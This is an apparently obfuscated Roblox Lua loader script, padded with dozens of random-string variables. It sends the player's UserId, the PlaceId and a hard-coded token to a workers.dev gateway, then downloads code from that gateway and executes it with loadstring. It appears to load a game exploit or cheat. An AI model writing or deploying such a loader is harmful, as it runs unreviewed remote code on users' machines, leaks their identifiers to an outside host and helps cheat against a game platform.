_G["__lb_reached_redirect"] = true
local mxdhmfeam = "3u1xmnizei35xbuqms"
local lunqpndfu = "4r5jni29gyhyfyc"
local wqnzzmlaosovth = "x53mcxvedh"
local qeortyhlzhf = "vqgn2rbu3cz"
local bbbjkpcy = "qcy73yplwit01qbi9"
local pzsynqzvnowaex = "gdwu29hualz53tiuc"
local gskouwhbneacuf = "mjmmo0zkz79wq1m"
local zilirubyd = "0a6sxb3uku0wjx"
local mdybhnpfsmx = "yo845oum1xrp6"
local fsahbinnjezlik = "9szuan6lc5exwr"
local ypynntlhgc = "u6bwvhl7gob4u"
local lajbkbgmu = "bh5dqxh4xeeu"
if _G["lazybear0340"] ~= true then return end
local vhrvjqtkkkoy = "tb4wijaes3wrxve"
local nticnwtmrpdzah = "3dtfnv8928nj5kqr"
local kocmxioqo = "cnxxaa2fll2v"
local rxgazukjckfim = "qfr9fnou89"
local qvglmladmgbast = "7lez89l2p3b7hzv4i0"
local cxpnkctjkxdtfo = "e7m66z16h59"
local dwyisaafm = "uen0j83648hb5"
local qkcllkwrc = "prkh4uqkmeiie"
local cdsatccvujn = "7ruf6j6f67yp85"
local xlmklpvdji = "ztlv1ovrn2602dzl"
local raoivfdmgylev = "aqhtw09gjz0jdw"
local geaolrgrjignmr = "md92k2du5czxz86a"
_G["stwhfixhn"] = "f4l32mh8adbi95zrc1"
local gevwlkivw = "6u50ubv8lfdlmq44"
local dwcjskfq = "qojq7t69yqt96dhots"
local rdcaisficf = "qgjwm7e1tnukhkj2"
local jwzbjqabcpfdo = "y2ws2ems69h2j"
local ehngnxnwi = "0vxcqhb05d"
local hsurdyrqphtcco = "g7xgfuoyw0"
local iiflcqvc = "17p7t32795i53p0"
local eabhpquezhavt = "hpsmwte0wgj3lfcgla"
local gfoxfgklawoja = "keho5tw5v82"
local fgnwpkmynzoxd = "bttcd0wbzagaty"
local oamekoqajnnq = "hl9lc5ii65mlb"
local smnazibecgji = "5u7gtg99bpg"
local qywgeqtixpwcr = "g7sm0361o8f"
local pidpusdla = "gx0fro48xb1nq78dvrn"
_G["emtjgrudupnb"] = auth
local ivpuynfsxsatgu = tostring(game:GetService("Players").LocalPlayer.UserId)
local tnxsdwstbfyvzx = tostring(game.PlaceId)
local hexdjqbjiy = "https://lazybear-gateway.iusemaybehook.workers.dev/?file=lazybear0340_123.lua&token=WfDj5KdPUH6uLJD9Y5xGDXOh5vSp62EQPXhzSsAqvqk&ck=" .. pidpusdla .. "&sv=f4l32mh8adbi95zrc1&uid=" .. ivpuynfsxsatgu .. "&pid=" .. tnxsdwstbfyvzx
local clcupakftbqpev = game:HttpGet(hexdjqbjiy, true)
loadstring(clcupakftbqpev)()
_G["emtjgrudupnb"] = nil
